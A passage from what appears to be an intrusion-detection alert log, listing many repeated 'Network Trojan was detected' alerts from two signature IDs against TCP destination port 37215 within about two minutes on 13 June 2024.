              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.609821
              SID:2829579
              Source Port:37560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304047
              SID:2835222
              Source Port:54794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612551
              SID:2829579
              Source Port:41500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783734
              SID:2835222
              Source Port:39702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729323
              SID:2829579
              Source Port:42198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304565
              SID:2829579
              Source Port:34340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510087
              SID:2835222
              Source Port:44180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995989
              SID:2835222
              Source Port:36642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439760
              SID:2829579
              Source Port:44098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678074
              SID:2835222
              Source Port:52446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059662
              SID:2835222
              Source Port:53310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834688
              SID:2829579
              Source Port:48786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836582
              SID:2835222
              Source Port:48758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565231
              SID:2835222
              Source Port:40944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227929
              SID:2829579
              Source Port:44326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301254
              SID:2835222
              Source Port:40164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488432
              SID:2829579
              Source Port:37634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991098
              SID:2829579
              Source Port:39814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786529
              SID:2835222
              Source Port:43324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042067
              SID:2835222
              Source Port:52310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167983
              SID:2829579
              Source Port:56372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195343
              SID:2829579
              Source Port:57078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630295
              SID:2835222
              Source Port:56392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670292
              SID:2829579
              Source Port:52796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457148
              SID:2829579
              Source Port:33470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137730
              SID:2829579
              Source Port:37486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805577
              SID:2835222
              Source Port:45252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310092
              SID:2829579
              Source Port:56088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474678
              SID:2835222
              Source Port:50250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.786802
              SID:2829579
              Source Port:43826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039876
              SID:2829579
              Source Port:43194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106783
              SID:2835222
              Source Port:49712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377414
              SID:2829579
              Source Port:59152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220938
              SID:2829579
              Source Port:34822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221123
              SID:2835222
              Source Port:36726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403749
              SID:2829579
              Source Port:58508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079388
              SID:2829579
              Source Port:51480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229428
              SID:2835222
              Source Port:48662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417949
              SID:2835222
              Source Port:34294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221890
              SID:2835222
              Source Port:48142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111988
              SID:2829579
              Source Port:56422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755768
              SID:2835222
              Source Port:36858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439888
              SID:2835222
              Source Port:41790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344685
              SID:2835222
              Source Port:49280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707879
              SID:2829579
              Source Port:50558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129476
              SID:2835222
              Source Port:42822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377559
              SID:2835222
              Source Port:36182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973096
              SID:2829579
              Source Port:40406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174039
              SID:2835222
              Source Port:33698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.247922
              SID:2829579
              Source Port:55758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294385
              SID:2829579
              Source Port:41722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.023936
              SID:2835222
              Source Port:39950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634618
              SID:2835222
              Source Port:50678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911203
              SID:2829579
              Source Port:50840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257375
              SID:2835222
              Source Port:46178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440666
              SID:2835222
              Source Port:39344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843891
              SID:2835222
              Source Port:41920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.119458
              SID:2829579
              Source Port:44100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274313
              SID:2829579
              Source Port:51930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323092
              SID:2829579
              Source Port:60252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155910
              SID:2829579
              Source Port:56130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246483
              SID:2835222
              Source Port:38882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181582
              SID:2835222
              Source Port:37760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276970
              SID:2829579
              Source Port:59936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.866369
              SID:2835222
              Source Port:37290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836359
              SID:2829579
              Source Port:48914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912084
              SID:2829579
              Source Port:47326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153847
              SID:2835222
              Source Port:53360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323290
              SID:2829579
              Source Port:43460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075168
              SID:2829579
              Source Port:40050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358846
              SID:2835222
              Source Port:43270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478129
              SID:2829579
              Source Port:36942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550670
              SID:2829579
              Source Port:38468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456008
              SID:2835222
              Source Port:43988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887434
              SID:2835222
              Source Port:38128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993482
              SID:2835222
              Source Port:36746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972068
              SID:2829579
              Source Port:38314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224234
              SID:2835222
              Source Port:33736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212528
              SID:2835222
              Source Port:37946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127494
              SID:2829579
              Source Port:36442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800741
              SID:2829579
              Source Port:35972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.196464
              SID:2829579
              Source Port:46956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568352
              SID:2829579
              Source Port:49040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405545
              SID:2835222
              Source Port:59390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.693864
              SID:2829579
              Source Port:34772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670697
              SID:2835222
              Source Port:33388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506050
              SID:2835222
              Source Port:34080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273971
              SID:2835222
              Source Port:56718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870613
              SID:2829579
              Source Port:35086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823665
              SID:2829579
              Source Port:37434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478623
              SID:2829579
              Source Port:36214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278545
              SID:2829579
              Source Port:43654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658031
              SID:2829579
              Source Port:56272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659174
              SID:2835222
              Source Port:44414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782491
              SID:2829579
              Source Port:33148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298952
              SID:2835222
              Source Port:45864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454337
              SID:2835222
              Source Port:56910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294890
              SID:2835222
              Source Port:46052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567455
              SID:2835222
              Source Port:46658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547060
              SID:2835222
              Source Port:47426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.273712
              SID:2835222
              Source Port:55012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839986
              SID:2835222
              Source Port:59092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248161
              SID:2829579
              Source Port:35220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016552
              SID:2829579
              Source Port:51330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300562
              SID:2835222
              Source Port:44078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415650
              SID:2829579
              Source Port:53694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356311
              SID:2835222
              Source Port:42118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805827
              SID:2835222
              Source Port:51582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347232
              SID:2835222
              Source Port:39070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783985
              SID:2829579
              Source Port:38398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.161069
              SID:2835222
              Source Port:51340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165694
              SID:2835222
              Source Port:34648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420311
              SID:2835222
              Source Port:47068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086751
              SID:2829579
              Source Port:55452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089078
              SID:2829579
              Source Port:55530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211634
              SID:2829579
              Source Port:41258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266736
              SID:2835222
              Source Port:46612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802436
              SID:2829579
              Source Port:52830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075000
              SID:2829579
              Source Port:47864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.935990
              SID:2829579
              Source Port:38322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024258
              SID:2829579
              Source Port:42136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.091937
              SID:2835222
              Source Port:35354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404609
              SID:2829579
              Source Port:37048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156901
              SID:2835222
              Source Port:46378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943429
              SID:2835222
              Source Port:59370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151927
              SID:2829579
              Source Port:38278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355050
              SID:2835222
              Source Port:40970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405415
              SID:2829579
              Source Port:49450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223385
              SID:2835222
              Source Port:35828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989780
              SID:2835222
              Source Port:53294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456601
              SID:2829579
              Source Port:51142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079160
              SID:2835222
              Source Port:56900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821460
              SID:2829579
              Source Port:50472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307782
              SID:2835222
              Source Port:50372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400944
              SID:2835222
              Source Port:55036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726111
              SID:2829579
              Source Port:32982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349135
              SID:2829579
              Source Port:54468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164385
              SID:2835222
              Source Port:36376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781574
              SID:2835222
              Source Port:60676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024615
              SID:2835222
              Source Port:57340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269864
              SID:2835222
              Source Port:46312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416285
              SID:2829579
              Source Port:60144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437051
              SID:2829579
              Source Port:54770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680005
              SID:2835222
              Source Port:38440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274349
              SID:2829579
              Source Port:52852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418165
              SID:2829579
              Source Port:54634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306517
              SID:2829579
              Source Port:39094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527808
              SID:2835222
              Source Port:51262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111031
              SID:2835222
              Source Port:60302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014767
              SID:2829579
              Source Port:51420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.944034
              SID:2829579
              Source Port:38868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801328
              SID:2835222
              Source Port:43144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359424
              SID:2835222
              Source Port:56208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197444
              SID:2835222
              Source Port:38906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675757
              SID:2829579
              Source Port:33922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274842
              SID:2835222
              Source Port:36944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297210
              SID:2829579
              Source Port:45808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728216
              SID:2835222
              Source Port:40826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.837279
              SID:2835222
              Source Port:40264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671582
              SID:2835222
              Source Port:45718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510137
              SID:2829579
              Source Port:35422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474251
              SID:2835222
              Source Port:50070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822647
              SID:2829579
              Source Port:40730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173039
              SID:2829579
              Source Port:59464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458807
              SID:2829579
              Source Port:37984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784496
              SID:2835222
              Source Port:42808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406441
              SID:2835222
              Source Port:44756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437257
              SID:2829579
              Source Port:38470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613159
              SID:2829579
              Source Port:37012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239875
              SID:2829579
              Source Port:37848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370581
              SID:2829579
              Source Port:47320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911017
              SID:2835222
              Source Port:47940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303401
              SID:2829579
              Source Port:58010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222193
              SID:2829579
              Source Port:52452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108457
              SID:2835222
              Source Port:34994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059631
              SID:2835222
              Source Port:39982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046295
              SID:2835222
              Source Port:44222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440774
              SID:2829579
              Source Port:37140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614261
              SID:2829579
              Source Port:55262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059449
              SID:2829579
              Source Port:41904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502189
              SID:2835222
              Source Port:56508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245532
              SID:2835222
              Source Port:49866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694091
              SID:2829579
              Source Port:39576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.931113
              SID:2835222
              Source Port:53442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408523
              SID:2829579
              Source Port:50674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943710
              SID:2829579
              Source Port:45042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419369
              SID:2835222
              Source Port:52764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991688
              SID:2829579
              Source Port:37566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969836
              SID:2835222
              Source Port:50530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454790
              SID:2829579
              Source Port:39006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107914
              SID:2835222
              Source Port:32942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090611
              SID:2829579
              Source Port:51938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262366
              SID:2829579
              Source Port:38160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223098
              SID:2835222
              Source Port:54292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.199761
              SID:2835222
              Source Port:55184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220853
              SID:2829579
              Source Port:37672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802486
              SID:2835222
              Source Port:36672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
